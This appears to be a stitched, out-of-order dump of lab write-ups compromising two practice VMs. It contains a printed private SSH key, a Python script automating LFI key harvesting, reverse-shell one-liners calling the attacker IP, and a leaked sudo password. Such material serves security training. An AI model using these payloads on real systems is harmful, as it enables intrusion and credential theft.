NWQcGzA4jgph96uLkNM/X2nYRdZEz2zrt45TtfJg9CnnNo8AhhYuI8sNxkLiWAhRwUy9zs
qYE7rohAPs7ukC1CsFeBUbqcmU4pPibUERes6lyXFHKlBpH7BnEz6/BY9RuaGG5B2DikbB
8t/CDO79q7ccfTZs+gOVRX4PW641+cZxo5/gL3GcdJwDY4ggPwbU/m8sYsyN1NWJ8NH00d
X8THaQAEXAO6TTzPMLgwJi+0kj1UTg+D+nONfh7xeXLseST0m1p+e9C/8rseZsSJSxoXKk
CmDy69aModcpW+ZXl9NcjEwrMvJPLLKjhIUcIhNjf4ABAAAAgEr3ZKUuJquBNFPhEUgUic
ivHoZH6U82VyEY2Bz24qevcVz2IcAXLBLIp+f1oiwYUVMIuWQDw6LSon8S72kk7VWiDrWz
lHjRfpUwWdzdWSMY6PI7EpGVVs0qmRC/TTqOIH+FXA66cFx3X4uOCjkzT0/Es0uNyZ07qQ
58cGE8cKrLAAAAgQDlPajDRVfDWgOWJj+imXfpGsmo81UDaYXwklzw4VM2SfIHIAFZPaA0
acm4/icKGPlnYWsvZCksvlUck+ti+J2RS2Mq9jmKB0AVZisFazj8qIde3SPPwtR7gBR329
JW3Db+KISMRIvdpJv+eiKQLg/epbSdwXZi0DJoB0a15FsIAQAAAIEA0uQl0d0p3NxCyT/+
Q6N+llf9TB5+VNjinaGu4DY6qVrSHmhkceHtXxG6h9upRtKw5BvOlSbTatlfMZYUtlZ1mL
RWCU8D7v1Qn7qMflx4bldYgV8lf18sb6g/uztWJuLpFe3Ue/MLgeJ+2TiAw9yYoPVySNK8
uhSHa0dvveoJ8xMAAAAZcWl1QGxvY2FsaG9zdC5sb2NhbGRvbWFpbgEC
-----END OPENSSH PRIVATE KEY-----

┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$ 
```
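The steps above (find the parameter name by filtering out the 80-byte error page, read /etc/passwd through it, pick the accounts that have a real home directory and shell, then try each one's id_rsa) as a single scripted chain. This is an added example, not code from the original notes: the HTTP layer is a `fetch(url) -> body` callable, so here it runs against a constructed stand-in for test.php (`FakeServer`, with an invented mini file system) instead of the live box; the candidate parameter list is also an assumption.

```python
"""Added example: automate the LFI chain from the FALL notes.

1. discover the GET parameter name the way `ffuf -fs 80` does: compare every
   candidate's response size with the baseline error page;
2. read /etc/passwd through the inclusion and keep real login users;
3. request <home>/.ssh/id_rsa for each of them and keep what comes back.
The HTTP layer is a plain callable so the logic runs offline against the
constructed FakeServer at the bottom (not the real 192.168.146.52).
"""
from typing import Callable, Dict, List
from urllib.parse import unquote, urlencode

Fetch = Callable[[str], str]

NOLOGIN_SHELLS = ("/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/bin/sync")


def find_param(fetch: Fetch, base: str, names: List[str], probe: str = "/etc/passwd") -> List[str]:
    """Return candidate parameter names whose response size differs from the baseline."""
    baseline = fetch(f"{base}?{urlencode({'zzz_unlikely_param': probe})}")
    hits = []
    for name in names:
        body = fetch(f"{base}?{urlencode({name: probe})}")
        if len(body) != len(baseline):
            hits.append(name)
    return hits


def parse_passwd(text: str) -> Dict[str, str]:
    """Map login users (uid 0 or >= 1000 with an interactive shell) to home dirs."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue
        name, uid, home, shell = fields[0], int(fields[2]), fields[5], fields[6]
        if (uid == 0 or uid >= 1000) and shell not in NOLOGIN_SHELLS:
            users[name] = home
    return users


def harvest_keys(fetch: Fetch, base: str, param: str) -> Dict[str, str]:
    """Read /etc/passwd through the LFI and return every readable id_rsa by user."""
    passwd = fetch(f"{base}?{urlencode({param: '/etc/passwd'})}")
    found = {}
    for user, home in parse_passwd(passwd).items():
        body = fetch(f"{base}?{urlencode({param: f'{home}/.ssh/id_rsa'})}")
        # the real test.php returned an empty body for /root/.ssh/id_rsa
        if "PRIVATE KEY" in body:
            found[user] = body
    return found


# ---- constructed stand-in for test.php; the contents below are invented, not from the box
ERROR_PAGE = "Missing GET parameter".ljust(80)  # 80 bytes, the size ffuf filtered out
PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:2:2:daemon:/sbin:/sbin/nologin\n"
    "apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin\n"
    "qiu:x:1000:1000::/home/qiu:/bin/bash\n"
)
FAKE_FS = {
    "/etc/passwd": PASSWD,
    "/home/qiu/.ssh/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nAAAA...\n-----END OPENSSH PRIVATE KEY-----\n",
    # /root/.ssh/id_rsa is deliberately absent: the web user cannot read /root
}


class FakeServer:
    """Behaves like test.php: `file=` includes a path, any other query is the error page."""

    def __init__(self, fs: Dict[str, str]):
        self.fs = fs
        self.requests = 0

    def fetch(self, url: str) -> str:
        self.requests += 1
        _, _, query = url.partition("?")
        params = dict(pair.split("=", 1) for pair in query.split("&") if "=" in pair)
        if "file" not in params:
            return ERROR_PAGE
        return self.fs.get(unquote(params["file"]), "")


def demo() -> Dict[str, str]:
    """Run the whole chain against the fake server and return user -> key."""
    server = FakeServer(FAKE_FS)
    base = "http://192.168.146.52/test.php"
    params = find_param(server.fetch, base, ["page", "id", "file", "path", "view"])
    assert params == ["file"]
    return harvest_keys(server.fetch, base, params[0])


if __name__ == "__main__":
    for user, key in demo().items():
        print(f"[+] {user}: {key.splitlines()[0]}")
```

Against a real target replace `server.fetch` with a function built on `requests.get` (and widen the candidate list to a SecLists wordlist); the size-based filter is the same trick as `-fs 80`, so a script that returns variable-length error pages would need a content comparison instead.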
257 | Get qiu's ssh key 258 | 259 | ``` 260 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 261 | └─$ ls -al 262 | total 36 263 | drwxr-xr-x 2 aacai aacai 4096 Jul 15 12:11 . 264 | drwxr-xr-x 13 aacai aacai 4096 Jul 15 10:55 .. 265 | -rw-r--r-- 1 aacai aacai 3150 Jul 15 11:07 44567.txt 266 | -rw-r--r-- 1 aacai aacai 3446 Jul 15 11:13 49199.txt 267 | -rw-r--r-- 1 aacai aacai 1080 Jul 15 11:09 49345.txt 268 | -rw-r--r-- 1 aacai aacai 1070 Jul 15 11:03 49390.txt 269 | -rw-r--r-- 1 aacai aacai 3596 Jul 15 11:11 80_info.txt 270 | -rw-r--r-- 1 aacai aacai 1633 Jul 15 12:00 passwd.txt 271 | -rw-r--r-- 1 aacai aacai 1831 Jul 15 12:11 ssh_rsa 272 | 273 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 274 | └─$ 275 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 276 | └─$ ssh -i ssh_rsa qiu@192.168.146.52 277 | The authenticity of host '192.168.146.52 (192.168.146.52)' can't be established. 278 | ECDSA key fingerprint is SHA256:+P4Rs5s4ipya3/t+GBoy0WjQqL/LaExt9MFvWgld4xc. 279 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 280 | Warning: Permanently added '192.168.146.52' (ECDSA) to the list of known hosts. 281 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 282 | @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ 283 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 284 | Permissions 0644 for 'ssh_rsa' are too open. 285 | It is required that your private key files are NOT accessible by others. 286 | This private key will be ignored. 287 | Load key "ssh_rsa": bad permissions 288 | qiu@192.168.146.52: Permission denied (publickey,gssapi-keyex,gssapi-with-mic). 289 | 290 | ``` 291 |
Incorrect file permissions, modify permissions 292 | 293 | ``` 294 | └─$ sudo chmod 600 ssh_rsa 255 ⨯ 295 | [sudo] password for aacai: 296 | 297 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 298 | └─$ ls -al 299 | total 36 300 | drwxr-xr-x 2 aacai aacai 4096 Jul 15 12:11 . 301 | drwxr-xr-x 13 aacai aacai 4096 Jul 15 10:55 .. 302 | -rw-r--r-- 1 aacai aacai 3150 Jul 15 11:07 44567.txt 303 | -rw-r--r-- 1 aacai aacai 3446 Jul 15 11:13 49199.txt 304 | -rw-r--r-- 1 aacai aacai 1080 Jul 15 11:09 49345.txt 305 | -rw-r--r-- 1 aacai aacai 1070 Jul 15 11:03 49390.txt 306 | -rw-r--r-- 1 aacai aacai 3596 Jul 15 11:11 80_info.txt 307 | -rw-r--r-- 1 aacai aacai 1633 Jul 15 12:00 passwd.txt 308 | -rw------- 1 aacai aacai 1831 Jul 15 12:11 ssh_rsa 309 | 310 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 311 | └─$ 312 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 313 | └─$ ssh -i ssh_rsa qiu@192.168.146.52 314 | Web console: https://FALL:9090/ or https://192.168.146.52:9090/ 315 | 316 | Last login: Sun Sep 5 19:28:51 2021 317 | [qiu@FALL ~]$ 318 | login successful 319 | ``` 320 | ## Privilege escalation 321 | ``` 322 | [qiu@FALL ~]$ ls -a 323 | . .. 
.bash_history .bash_logout .bash_profile .bashrc local.txt reminder .ssh 324 | [qiu@FALL ~]$ cat .bash_history 325 | ls -al 326 | cat .bash_history 327 | rm .bash_history 328 | echo "remarkablyawesomE" | sudo -S dnf update 329 | ifconfig 330 | ping www.google.com 331 | ps -aux 332 | ps -ef | grep apache 333 | env 334 | env > env.txt 335 | rm env.txt 336 | lsof -i tcp:445 337 | lsof -i tcp:80 338 | ps -ef 339 | lsof -p 1930 340 | lsof -p 2160 341 | rm .bash_history 342 | exit 343 | ls -al 344 | cat .bash_history 345 | exit 346 | [qiu@FALL ~]$ id 347 | uid=1000(qiu) gid=1000(qiu) groups=1000(qiu),10(wheel) 348 | [qiu@FALL ~]$ sudo -l 349 | [sudo] password for qiu: 350 | Matching Defaults entries for qiu on FALL: 351 | !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG 352 | LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME 353 | LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", 354 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 355 | 356 | User qiu may run the following commands on FALL: 357 | (ALL) ALL 358 | [qiu@FALL ~]$ 359 | 360 | ``` 361 |
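Both boxes on this page end with sudo: on Cute, www-data has a NOPASSWD rule for `/usr/sbin/hping3 --icmp` next to `(ALL) NOPASSWD: ALL`; on FALL, qiu has `(ALL) ALL` and the password sits in .bash_history, piped into `sudo -S`. The following added example (not code from the notes) triages exactly those two situations: it parses `sudo -l` output into rules, explains what each rule grants, decides whether a given command line would be accepted (sudo matches listed arguments literally, a rule without arguments accepts any, `ALL` accepts everything), and scans a shell history for passwords piped into `sudo -S`. The two `sudo -l` texts and the history line are copies of the outputs shown in these notes; the rule grammar handled is the common `(runas) [NOPASSWD:] command [args]` form only, which is an assumption.

```python
"""Added example: triage `sudo -l` output and shell history for privilege escalation.

Semantics implemented (from sudoers(5)): a rule `(runas) [NOPASSWD:] command [args]`
accepts an invocation only if the command path matches and, when arguments are
listed, the arguments match exactly; a rule without arguments accepts any
arguments; `ALL` accepts every command.
"""
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(?:(NOPASSWD|PASSWD):\s*)?(.+?)\s*$")
PIPED_SUDO_RE = re.compile(r"""echo\s+(['"]?)(.+?)\1\s*\|\s*sudo\s+-S""")


@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str               # "ALL" or an absolute path
    args: Optional[List[str]]  # None means any arguments are allowed

    def permits(self, argv: List[str]) -> bool:
        """Would `sudo <argv>` be accepted by this rule on its own?"""
        if self.command == "ALL":
            return True
        if not argv or argv[0] != self.command:
            return False
        return self.args is None or argv[1:] == self.args

    def describe(self) -> str:
        pw = "without a password" if self.nopasswd else "with the user's password"
        if self.command == "ALL":
            return f"any command as {self.runas} {pw}: full compromise (e.g. sudo su)"
        restriction = f" only with arguments {' '.join(self.args)}" if self.args else ""
        return f"{self.command}{restriction} as {self.runas} {pw}"


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract the rules listed after 'may run the following commands'."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas, tag, spec = m.groups()
        if spec == "ALL":
            rules.append(SudoRule(runas, tag == "NOPASSWD", "ALL", None))
        else:
            parts = shlex.split(spec)
            rules.append(SudoRule(runas, tag == "NOPASSWD", parts[0], parts[1:] or None))
    return rules


def permitting_rules(rules: List[SudoRule], cmdline: str) -> List[SudoRule]:
    """The rules that would accept this exact `sudo ...` command line."""
    argv = shlex.split(cmdline)
    if argv and argv[0] == "sudo":
        argv = argv[1:]
    return [r for r in rules if r.permits(argv)]


def passwords_piped_to_sudo(history: str) -> List[str]:
    """Find `echo "<password>" | sudo -S ...` lines left in a shell history."""
    return [m.group(2) for m in PIPED_SUDO_RE.finditer(history)]


# ---- copies of the `sudo -l` outputs and the .bash_history line shown in the notes
CUTE_SUDO_L = """\
Matching Defaults entries for www-data on cute:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on cute:
    (root) NOPASSWD: /usr/sbin/hping3 --icmp
    (ALL) NOPASSWD: ALL
"""
FALL_SUDO_L = """\
User qiu may run the following commands on FALL:
    (ALL) ALL
"""
FALL_HISTORY = 'ls -al\necho "remarkablyawesomE" | sudo -S dnf update\nifconfig\n'


if __name__ == "__main__":
    cute = parse_sudo_l(CUTE_SUDO_L)
    for rule in cute:
        print("cute:", rule.describe())
    # the argument-less `sudo /usr/sbin/hping3` from the notes passes only because of the ALL rule
    print("sudo /usr/sbin/hping3 accepted by:",
          [r.command for r in permitting_rules(cute, "sudo /usr/sbin/hping3")])
    fall = parse_sudo_l(FALL_SUDO_L)
    print("fall:", fall[0].describe(), "| password from history:", passwords_piped_to_sudo(FALL_HISTORY))
```

Run on Cute's output the script reports that `sudo /usr/sbin/hping3` is accepted by the `ALL` rule alone, which is the point worth writing in a report: the `--icmp` restriction on the hping3 rule is dead configuration next to `(ALL) NOPASSWD: ALL`. Real sudoers can also carry `!` negations, wildcards, host lists and `Cmnd_Alias` names, none of which this parser understands.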
This privilege escalation is almost too simple: .bash_history contains qiu's password, piped into `sudo -S` (`echo "remarkablyawesomE" | sudo -S dnf update`), qiu is a member of `wheel`, and `sudo -l` (which accepts that password) shows `(ALL) ALL`, so qiu may run anything as root.

```
[qiu@FALL ~]$ sudo su
[root@FALL qiu]# id
uid=0(root) gid=0(root) groups=0(root)
[root@FALL qiu]# who ami
[root@FALL qiu]# whoami
root
[root@FALL qiu]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:43:01:8a brd ff:ff:ff:ff:ff:ff
    inet 192.168.146.52/24 brd 192.168.146.255 scope global dynamic noprefixroute ens33
       valid_lft 67037sec preferred_lft 67037sec
    inet6 fe80::af86:ce1d:cf2a:e830/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
[root@FALL qiu]# cd
[root@FALL ~]# ls
anaconda-ks.cfg  original-ks.cfg  proof.txt  remarks.txt
[root@FALL ~]# cat proof.txt
Congrats on a root shell! :-)
[root@FALL ~]# 

```
-------------------------------------------------------------------------------- /Target Notes/Cute.md: --------------------------------------------------------------------------------
# Cute
## Information Gathering
### NMAP
#### Full Port Scan
```
└─$ sudo nmap -p- 192.168.146.75
[sudo] password for aaron: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 11:42 HKT
Nmap scan report for 192.168.146.75
Host is up (0.00020s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
88/tcp  open  kerberos-sec
110/tcp open  pop3
995/tcp open  pop3s
MAC Address: 00:0C:29:1B:B0:20 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 10.06 seconds

```
#### Scan of the Specified Ports
```
└─$ sudo nmap -p22,80,88,110,995 -sV -A 192.168.146.75
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 11:42 HKT
Nmap scan report for 192.168.146.75
Host is up (0.00042s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
|   256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_  256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp  open  http     nginx 1.14.2
|_http-title: 404 Not Found
|_http-server-header: nginx/1.14.2
110/tcp open  pop3     Courier pop3d
|_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) UTF8(USER) PIPELINING UIDL USER TOP LOGIN-DELAY(10) STLS
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3 Courier pop3d
|_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) PIPELINING UTF8(USER) USER TOP LOGIN-DELAY(10) UIDL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after:  2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:1B:B0:20 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.146.75

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.22 seconds
```
### Web Information Gathering
#### Nikto
```
└─$ nikto -h 192.168.146.75
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.146.75
+ Target Hostname:    192.168.146.75
+ Target Port:        80
+ Start Time:         2022-07-25 11:44:49 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie CUTENEWS_SESSION created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.php, /index.html
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5af83f7e950ce, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2022-07-25 11:45:40 (GMT8) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
##### index.php exists
![Img](../FILES/Cute/img-20220725114624.png)
##### Users can be registered
##### Open the registration page
![Img](../FILES/Cute/img-20220725114706.png)
##### The captcha does not show up
##### View the page source
![Img](../FILES/Cute/img-20220725114756.png)
##### There is a captcha.php
![Img](../FILES/Cute/img-20220725114807.png)
##### Opening it reveals the captcha value
##### Log in after registering
![Img](../FILES/Cute/img-20220725114835.png)
##### The version number in the footer is 2.1.2; search for it on Google
![Img](../FILES/Cute/img-20220725114909.png)
##### This version has an RCE
#### Exploitation
```
└─$ searchsploit cutenews 2.1.2
---------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                          |  Path
---------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)                            | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion                                                | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload                                    | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution                                                  | php/webapps/48800.py
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
##### Exploit-DB has a ready-made Python script
##### Download it and use it
```
└─$ searchsploit -m php/webapps/48800.py
  Exploit: CuteNews 2.1.2 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48800
     Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
File Type: Python script, ASCII text executable

Copied to: /home/aaron/Desktop/Cute-192.168.146.75/48800.py



┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75]
└─$ ls
48800.py  LANs.py
└─$ python3 48800.py



  _____      __      _  __                 ___   ___   ___ 
 / ___/_ __ / /____ / |/ /__ _    _____   |_  | <  / |_  |
/ /__/ // // __/ -_)    / -_) |/|/ (_-<  / __/_ / / / __/ 
\___/\_,_/ \__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/ 
   ___  _________
  / _ \/ ___/ __/
 / , _/ /__/ _/  
/_/|_|\___/___/  




[->] Usage python3 expoit.py

Enter the URL> http://192.168.146.75/
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
[-] No hashes were found skipping!!!
================================================================

=============================
Registering a users
=============================

┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75]
└─$ 

```
##### It does not get past this point, so look at the exploit code
![Img](../FILES/Cute/img-20220725115151.png)
##### We do not have the directory the exploit expects; remove every occurrence of that directory from the EXP and try again
Run it again:
![Img](../FILES/Cute/img-20220725115318.png)
##### Now it runs
```
command > whoami
www-data

command > ls
avatar_55Y2xTic4I_55Y2xTic4I.php
avatar_ET3TpbEJQk_ET3TpbEJQk.php
avatar_IgJLU8OSMX_IgJLU8OSMX.php
avatar_PoKxESSE4D_PoKxESSE4D.php
avatar_RvFcklLkzE_RvFcklLkzE.php
avatar_VvgU5CZIce_VvgU5CZIce.php
avatar_cruDW9A0zh_cruDW9A0zh.php
avatar_rwRemM6TLd_message2.jpg
index.html
```
##### Launch a reverse shell
```
php -r '$sock=fsockopen("192.168.146.50",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

```

![Img](../FILES/Cute/img-20220725115522.png)
##### Shell obtained
### Privilege Escalation
#### Enumerate with linpeas
```
www-data@cute:/tmp$ wget http://192.168.146.50/linpeas.sh
wget http://192.168.146.50/linpeas.sh
--2022-07-23 14:30:48--  http://192.168.146.50/linpeas.sh
Connecting to 192.168.146.50:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 777005 (759K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 758.79K  --.-KB/s    in 0.02s   

2022-07-23 14:30:48 (43.2 MB/s) - 'linpeas.sh' saved [777005/777005]

```
##### Usable findings
```
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on cute:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on cute:
    (root) NOPASSWD: /usr/sbin/hping3 --icmp
    (ALL) NOPASSWD: ALL

```
##### hping3 can be run through sudo directly
```
www-data@cute:/tmp$ sudo /usr/sbin/hping3
sudo /usr/sbin/hping3
hping3> id
id
uid=0(root) gid=0(root) groups=0(root)
hping3> whoami
whoami
root
hping3> pwd
pwd
/tmp
hping3> 
```
##### Reverse shell with nc
```
hping3> nc -e /bin/sh 192.168.146.50 4445
nc -e /bin/sh 192.168.146.50 4445
```
##### Root shell
```
┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75]
└─$ nc -lvnp 4445
listening on [any] 4445 ...
connect to [192.168.146.50] from (UNKNOWN) [192.168.146.75] 57576
id
uid=0(root) gid=0(root) groups=0(root)
/usr/bin/script -qc /bin/bash /dev/null
root@cute:/tmp# cd /root
cd /root
root@cute:~# ls
ls
localweb  root.txt
root@cute:~# cat root.txtg
cat root.txtg
cat: root.txtg: No such file or directory
root@cute:~# cat root.txt
cat root.txt
0b18032c2d06d9e738ede9bc24795ff2
root@cute:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:1b:b0:20 brd ff:ff:ff:ff:ff:ff
    inet 192.168.146.75/24 brd 192.168.146.255 scope global dynamic ens33
       valid_lft 70362sec preferred_lft 70362sec
    inet6 fe80::20c:29ff:fe1b:b020/64 scope link 
       valid_lft forever preferred_lft forever
root@cute:~# whoami
whoami
root
root@cute:~# 
```
![Img](../FILES/Cute/img-20220725120352.png)



-------------------------------------------------------------------------------- /Target Notes/FALL.md: --------------------------------------------------------------------------------
# 192.168.146.52
## Information Gathering
### NMAP
```
└─$ sudo nmap -A -sV -T4 -p- 192.168.146.52
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-15 10:56 HKT
Stats: 0:02:27 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.58% done; ETC: 10:58 (0:00:00 remaining)
Nmap scan report for 192.168.146.52
Host is up (0.00021s latency).
11 | Not shown: 65522 filtered ports 12 | PORT STATE SERVICE VERSION 13 | 22/tcp open ssh OpenSSH 7.8 (protocol 2.0) 14 | | ssh-hostkey: 15 | | 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA) 16 | | 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA) 17 | |_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519) 18 | 80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3) 19 | |_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved. 20 | | http-robots.txt: 1 disallowed entry 21 | |_/ 22 | |_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3 23 | |_http-title: Good Tech Inc's Fall Sales - Home 24 | 111/tcp closed rpcbind 25 | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA) 26 | 443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3) 27 | |_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved. 
28 | | http-robots.txt: 1 disallowed entry 29 | |_/ 30 | |_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3 31 | |_http-title: Good Tech Inc's Fall Sales - Home 32 | | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US 33 | | Subject Alternative Name: DNS:localhost.localdomain 34 | | Not valid before: 2019-08-15T03:51:33 35 | |_Not valid after: 2020-08-19T05:31:33 36 | |_ssl-date: TLS randomness does not represent time 37 | | tls-alpn: 38 | |_ http/1.1 39 | 445/tcp open netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA) 40 | 3306/tcp open mysql MySQL (unauthorized) 41 | 8000/tcp closed http-alt 42 | 8080/tcp closed http-proxy 43 | 8443/tcp closed https-alt 44 | 9090/tcp open http Cockpit web service 162 - 188 45 | |_http-title: Did not follow redirect to https://192.168.146.52:9090/ 46 | 10080/tcp closed amanda 47 | 10443/tcp closed cirrossp 48 | MAC Address: 00:0C:29:43:01:8A (VMware) 49 | Device type: general purpose 50 | Running: Linux 5.X 51 | OS CPE: cpe:/o:linux:linux_kernel:5 52 | OS details: Linux 5.0 - 5.4 53 | Network Distance: 1 hop 54 | Service Info: Host: FALL; OS: Linux; CPE: 